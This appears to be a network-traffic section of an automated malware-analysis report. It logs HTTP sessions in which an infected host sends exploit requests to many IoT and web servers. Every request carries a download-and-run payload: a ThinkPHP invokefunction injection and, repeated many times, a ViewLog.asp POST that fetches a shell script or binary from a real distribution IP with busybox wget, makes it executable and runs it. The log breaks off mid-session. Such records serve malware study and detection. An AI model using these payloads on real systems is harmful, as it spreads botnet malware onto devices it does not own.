                                                        Apr 14, 2024 16:37:05.138411045 CEST333OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://194.62.248.103/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Apr 14, 2024 16:37:05.433528900 CEST201INHTTP/1.1 400 Invalid Request
                                                        Date: Sun, 14 Apr 2024 14:37:05 GMT
                                                        Connection: close
                                                        Content-Type: text/html; charset=iso-8859-1
                                                        Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 48 54 54 50 20 45 72 72 6f 72 3a 20 34 30 30 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a 0a
                                                        Data Ascii: <HTML><HEAD></HEAD><BODY>HTTP Error: 400</BODY></HTML>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        834192.168.2.235030895.217.192.1738080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:37:05.269108057 CEST326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:37:05.589710951 CEST146INHTTP/1.1 307 Temporary Redirect
                                                        Location: /containers/
                                                        Date: Sun, 14 Apr 2024 14:37:05 GMT
                                                        Content-Length: 0
                                                        Connection: close


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        835192.168.2.235635662.182.80.938080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:37:05.586491108 CEST326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:37:05.902998924 CEST320INHTTP/1.1 404 Not Found
                                                        Server: nginx/1.24.0
                                                        Date: Sun, 14 Apr 2024 14:38:13 GMT
                                                        Content-Type: text/html
                                                        Content-Length: 153
                                                        Connection: keep-alive
                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 34 2e 30 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                        Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.24.0</center></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        836192.168.2.234450631.136.91.1258080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:37:05.587893009 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:37:06.548177004 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:37:08.499908924 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:37:12.371344090 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:37:20.306231022 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:37:35.919915915 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:38:07.403820038 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        837192.168.2.234035894.121.209.1808080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:37:05.933203936 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        838192.168.2.236073694.238.89.1908080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:37:06.244093895 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:37:09.299721956 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        839192.168.2.235084285.214.209.258080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:37:06.253881931 CEST326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:37:06.567605019 CEST556INHTTP/1.1 400 Bad Request
                                                        Date: Sun, 14 Apr 2024 14:37:06 GMT
                                                        Server: Apache/2.4.10 (Debian)
                                                        Content-Length: 362
                                                        Connection: close
                                                        Content-Type: text/html; charset=iso-8859-1
                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 52 65 61 73 6f 6e 3a 20 59 6f 75 27 72 65 20 73 70 65 61 6b 69 6e 67 20 70 6c 61 69 6e 20 48 54 54 50 20 74 6f 20 61 6e 20 53 53 4c 2d 65 6e 61 62 6c 65 64 20 73 65 72 76 65 72 20 70 6f 72 74 2e 3c 62 72 20 2f 3e 0a 20 49 6e 73 74 65 61 64 20 75 73 65 20 74 68 65 20 48 54 54 50 53 20 73 63 68 65 6d 65 20 74 6f 20 61 63 63 65 73 73 20 74 68 69 73 20 55 52 4c 2c 20 70 6c 65 61 73 65 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br />Reason: You're speaking plain HTTP to an SSL-enabled server port.<br /> Instead use the HTTPS scheme to access this URL, please.<br /></p></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        840192.168.2.233750631.136.66.2268080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:37:06.257206917 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:37:09.299709082 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:37:15.442822933 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:37:27.473387003 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:37:53.069968939 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        841192.168.2.235048231.136.172.2288080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:37:06.258147001 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:37:09.299688101 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:37:15.442831039 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:37:27.473299980 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:37:53.069847107 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        842192.168.2.235743494.123.137.1958080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:37:06.277686119 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        843192.168.2.234275294.121.52.528080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:37:06.280819893 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        844192.168.2.233407094.121.31.1228080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:37:06.281038046 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        845192.168.2.235284262.29.8.2088080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:37:06.283777952 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        846192.168.2.235292094.121.67.448080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:37:06.286972046 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
